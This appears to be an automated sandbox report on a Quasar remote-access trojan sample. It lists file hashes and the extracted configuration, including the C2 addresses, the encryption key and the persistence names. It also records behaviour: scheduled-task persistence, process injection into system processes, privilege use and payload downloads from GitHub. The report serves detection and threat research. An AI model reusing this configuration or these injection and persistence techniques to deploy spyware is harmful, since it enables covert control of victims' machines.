quasar | c2fac5230442f151a25ac8b3765caa659ecfe9e32e4e45e6e8097365a9a14436

General

Target

R0X-Built.exe
Size

409KB
MD5

2812f62b21fe2118e1259169e015b054
SHA1

e96a2077f063b0c5fc9708f9c1e89283999e4211
SHA256

c2fac5230442f151a25ac8b3765caa659ecfe9e32e4e45e6e8097365a9a14436
SHA512

bf5e18186402fcfd5dcd79bbbbe382ff9754e69098b6477dcef8cb3d69d71d67857fe6caf2362ed14aaf79412afb396a0f829a44335b31b7497ce0f690bb2aa2
SSDEEP

6144:cMP9p1kREG60olVji9QzNg/IiSjFqBFK6WbMN6Y44vZqJBWAb7yMTj:XpiREGJ2ji9QyAhK/N6gBqJBj7yMTj

Score

10^/10

quasar slave spyware trojan

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

192.168.1.20:4782

localhost:4782

Mutex

$Sxr-3vDee7FzoJnhqjuE3n

Attributes

encryption_key
hwZQsCIcvotNKosjYueb
install_name
$srr-powershell.exe
log_directory
Logs
reconnect_delay
1000
startup_key
$srr-mstha
subdirectory
Windows

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3000-1-0x0000000000C60000-0x0000000000CCC000-memory.dmp	family_quasar
C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 1312 created 612 1312 powershell.EXE winlogon.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

$srr-powershell.exeinstall.exe

pid process

4056 $srr-powershell.exe
3736 install.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

17 raw.githubusercontent.com
18 raw.githubusercontent.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

3 ip-api.com

description	pid	process	target process
PID 1312 created 612	1312	powershell.EXE	winlogon.exe

pid	process
4056	$srr-powershell.exe
3736	install.exe

flow	ioc
17	raw.githubusercontent.com
18	raw.githubusercontent.com

flow	ioc
3	ip-api.com

Drops file in System32 directory 4 IoCs

Processes:

powershell.EXEsvchost.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 1312 set thread context of 4180 1312 powershell.EXE dllhost.exe
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeSCHTASKS.exe

pid process

2236 schtasks.exe
868 schtasks.exe
4656 SCHTASKS.exe

description	pid	process	target process
PID 1312 set thread context of 4180	1312	powershell.EXE	dllhost.exe

pid	process
2236	schtasks.exe
868	schtasks.exe
4656	SCHTASKS.exe

Modifies data under HKEY_USERS 41 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE

Modifies registry class 24 IoCs

Processes:

RuntimeBroker.exe

description	ioc	process
Key deleted	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9a135c88-c2c7-41f2	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c2853c49-3897-4f35	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\837d50c9-763e-45ce	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1a697a0e-08f5-4646 = bccde27aeb9bda01	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1a697a0e-08f5-4646 = "8324"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1a697a0e-08f5-4646 = "\\\\?\\Volume{B97EBE19-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\ceffd43c2eefc052365c0b35386382f9054e37439b68bd9b93c8ea319691e98e"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\837d50c9-763e-45ce	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1a697a0e-08f5-4646	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1a697a0e-08f5-4646 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000dfa9727aeb9bda01731cc67aeb9bda01731cc67aeb9bda01b70500000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000a158368a2000636566666434336332656566633035323336356330623335333836333832663930353465333734333962363862643962393363386561333139363931653938650000b20009000400efbea158368aa158368a2e0000000000000000000000000000000000000000000000000057a18f00630065006600660064003400330063003200650065006600630030003500320033003600350063003000620033003500330038003600330038003200660039003000350034006500330037003400330039006200360038006200640039006200390033006300380065006100330031003900360039003100650039003800650000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000003c08b05a1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63656666643433633265656663303532333635633062333533383633383266393035346533373433396236386264396239336338656133313936393165393865000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000726861747165647100000000000000008e69c4ea1508f64e82bc7922d9c9b2b0b78f118ad003ef118fd74ade6abeb4228e69c4ea1508f64e82bc7922d9c9b2b0b78f118ad003ef118fd74ade6abeb422d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003900300036003200380037003000320030002d0032003900310035003400370034003600300038002d0031003700350035003600310037003700380037002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000019be7eb9000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f20f223f-8f1b-4967	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\837d50c9-763e-45ce	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\837d50c9-763e-45ce = 4abc397aeb9bda01	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\837d50c9-763e-45ce = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1a697a0e-08f5-4646 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1a697a0e-08f5-4646	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1a697a0e-08f5-4646 = "0"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\54673c7d-f7f8-4fae	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\837d50c9-763e-45ce = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\837d50c9-763e-45ce = "\\\\?\\Volume{B97EBE19-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\ceffd43c2eefc052365c0b35386382f9054e37439b68bd9b93c8ea319691e98e"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\837d50c9-763e-45ce = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\837d50c9-763e-45ce = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000a94a327aeb9bda01a94a327aeb9bda01a94a327aeb9bda01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000a158368a2000636566666434336332656566633035323336356330623335333836333832663930353465333734333962363862643962393363386561333139363931653938650000b20009000400efbea158368aa158368a2e0000000000000000000000000000000000000000000000000057a18f00630065006600660064003400330063003200650065006600630030003500320033003600350063003000620033003500330038003600330038003200660039003000350034006500330037003400330039006200360038006200640039006200390033006300380065006100330031003900360039003100650039003800650000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000003c08b05a1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63656666643433633265656663303532333635633062333533383633383266393035346533373433396236386264396239336338656133313936393165393865000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000726861747165647100000000000000008e69c4ea1508f64e82bc7922d9c9b2b0b58f118ad003ef118fd74ade6abeb4228e69c4ea1508f64e82bc7922d9c9b2b0b58f118ad003ef118fd74ade6abeb422d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003900300036003200380037003000320030002d0032003900310035003400370034003600300038002d0031003700350035003600310037003700380037002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000019be7eb9000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1a697a0e-08f5-4646	RuntimeBroker.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.EXEdllhost.exe

pid	process
1312	powershell.EXE
1312	powershell.EXE
1312	powershell.EXE
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe
4180	dllhost.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

R0X-Built.exe$srr-powershell.exepowershell.EXEdllhost.exe

description	pid	process
Token: SeDebugPrivilege	3000	R0X-Built.exe
Token: SeDebugPrivilege	4056	$srr-powershell.exe
Token: SeDebugPrivilege	1312	powershell.EXE
Token: SeDebugPrivilege	1312	powershell.EXE
Token: SeDebugPrivilege	4180	dllhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

R0X-Built.exe$srr-powershell.exepowershell.EXEdllhost.exe

description	pid	process	target process
PID 3000 wrote to memory of 2236	3000	R0X-Built.exe	schtasks.exe
PID 3000 wrote to memory of 2236	3000	R0X-Built.exe	schtasks.exe
PID 3000 wrote to memory of 2236	3000	R0X-Built.exe	schtasks.exe
PID 3000 wrote to memory of 4056	3000	R0X-Built.exe	$srr-powershell.exe
PID 3000 wrote to memory of 4056	3000	R0X-Built.exe	$srr-powershell.exe
PID 3000 wrote to memory of 4056	3000	R0X-Built.exe	$srr-powershell.exe
PID 4056 wrote to memory of 868	4056	$srr-powershell.exe	schtasks.exe
PID 4056 wrote to memory of 868	4056	$srr-powershell.exe	schtasks.exe
PID 4056 wrote to memory of 868	4056	$srr-powershell.exe	schtasks.exe
PID 3000 wrote to memory of 3736	3000	R0X-Built.exe	install.exe
PID 3000 wrote to memory of 3736	3000	R0X-Built.exe	install.exe
PID 3000 wrote to memory of 3736	3000	R0X-Built.exe	install.exe
PID 3000 wrote to memory of 4656	3000	R0X-Built.exe	SCHTASKS.exe
PID 3000 wrote to memory of 4656	3000	R0X-Built.exe	SCHTASKS.exe
PID 3000 wrote to memory of 4656	3000	R0X-Built.exe	SCHTASKS.exe
PID 1312 wrote to memory of 4180	1312	powershell.EXE	dllhost.exe
PID 1312 wrote to memory of 4180	1312	powershell.EXE	dllhost.exe
PID 1312 wrote to memory of 4180	1312	powershell.EXE	dllhost.exe
PID 1312 wrote to memory of 4180	1312	powershell.EXE	dllhost.exe
PID 1312 wrote to memory of 4180	1312	powershell.EXE	dllhost.exe
PID 1312 wrote to memory of 4180	1312	powershell.EXE	dllhost.exe
PID 1312 wrote to memory of 4180	1312	powershell.EXE	dllhost.exe
PID 1312 wrote to memory of 4180	1312	powershell.EXE	dllhost.exe
PID 4180 wrote to memory of 612	4180	dllhost.exe	winlogon.exe
PID 4180 wrote to memory of 668	4180	dllhost.exe	lsass.exe
PID 4180 wrote to memory of 964	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 380	4180	dllhost.exe	dwm.exe
PID 4180 wrote to memory of 424	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 1032	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 1116	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 1124	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 1204	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 1236	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 1288	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 1324	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 1344	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 1452	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 1492	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 1556	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 1580	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 1656	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 1712	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 1732	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 1804	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 1816	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 1932	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 1984	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 2004	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 1440	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 2084	4180	dllhost.exe	spoolsv.exe
PID 4180 wrote to memory of 2100	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 2184	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 2296	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 2516	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 2524	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 2552	4180	dllhost.exe	sihost.exe
PID 4180 wrote to memory of 2596	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 2760	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 2796	4180	dllhost.exe	svchost.exe
PID 4180 wrote to memory of 2816	4180	dllhost.exe	taskhostw.exe
PID 4180 wrote to memory of 2828	4180	dllhost.exe	sysmon.exe
PID 4180 wrote to memory of 2836	4180	dllhost.exe	svchost.exe
